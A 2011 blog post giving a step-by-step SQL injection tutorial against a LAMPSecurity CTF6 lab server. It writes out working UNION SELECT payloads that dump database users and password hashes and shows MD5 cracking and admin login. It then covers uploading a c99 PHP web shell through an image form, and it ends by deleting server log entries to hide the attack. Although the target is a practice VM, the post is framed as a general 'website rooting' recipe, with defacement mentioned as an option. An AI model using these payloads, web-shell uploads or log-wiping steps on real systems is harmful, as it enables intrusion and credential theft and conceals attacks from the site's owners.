Wednesday, 24 August 2011

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now


http://192.168.132.128/

[Image: mantrahackbar1.jpg]


Step 2:

I went through all the pages of web site and found a page with URL input


http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]


Step 3:

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]


Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.



http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables



http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]


Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]



Step 7:

I went up to 7 and no change till now



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]



Step 8:

I'm on 8 now and I can see the page changed



http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]



Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT

[Image: mantrahackbar14.jpg]



Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables

[Image: mantrahackbar16.jpg]



Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2



http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7


[Image: mantrahackbar19.jpg]



Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]

The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version



Step 14:

Let me list all the tables

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]



Step 16:

I want columns from the table "user" and nothing else

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]



Step 17:

Lets find the user name

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: mantrahackbar27.jpg]



Step 18:

Now, what about password

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]



Step 20:

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]



Step 21:

Finding the log in page. Its was right in front of me
[Image: mantrahackbar32.jpg]



Step 22:

Logging in with the credentials I have
[Image: mantrahackbar33.jpg]



Step 23:

Greetings.!!!

[Image: mantrahackbar35.jpg]



Step 24:

I'm an admin now. Look at my powers.

[Image: mantrahackbar36.jpg]



Step 25:

Let me add an event

[Image: mantrahackbar37.jpg]



Step 26:

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]



Step 27:

Lets see it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]



Step 28:

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]



Step 29:

Nice. Looks like it's got uploaded

[Image: mantrahackbar41.jpg]



Step 30:

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]



Step 31:

I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]

[Image: mantrahackbar44.jpg]



Step 32:

Looks like I got it

[Image: mantrahackbar45.jpg]

Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access

[Image: mantrahackbar46.jpg]



Step 34:

I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]

Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder

[Image: mantrahackbar49.jpg]




Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks

[Image: mantrahackbar51.jpg]



Step 37:

Let me go back and edit the log file

[Image: mantrahackbar52.jpg]

[Image: mantrahackbar53.jpg]



Step 38:

I deleted complete log entries. Now saving it.

[Image: mantrahackbar54.jpg]



Step 39:

Nice. Log file is empty now

[Image: mantrahackbar56.jpg]



Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove

[Image: mantrahackbar57.jpg]



Step 41:

Confirmed.!!!

[Image: mantrahackbar58.jpg]



Step 42:

OK. Good Bye C99

[Image: mantrahackbar59.jpg]



Step 43:

Well. It got deleted itself

[Image: mantrahackbar60.jpg]


H4qqy H4ck!ng
Posted by Unknown at 23:17
Labels: , , , , ,

2 comments:

Subscribe to: Post Comments (Atom)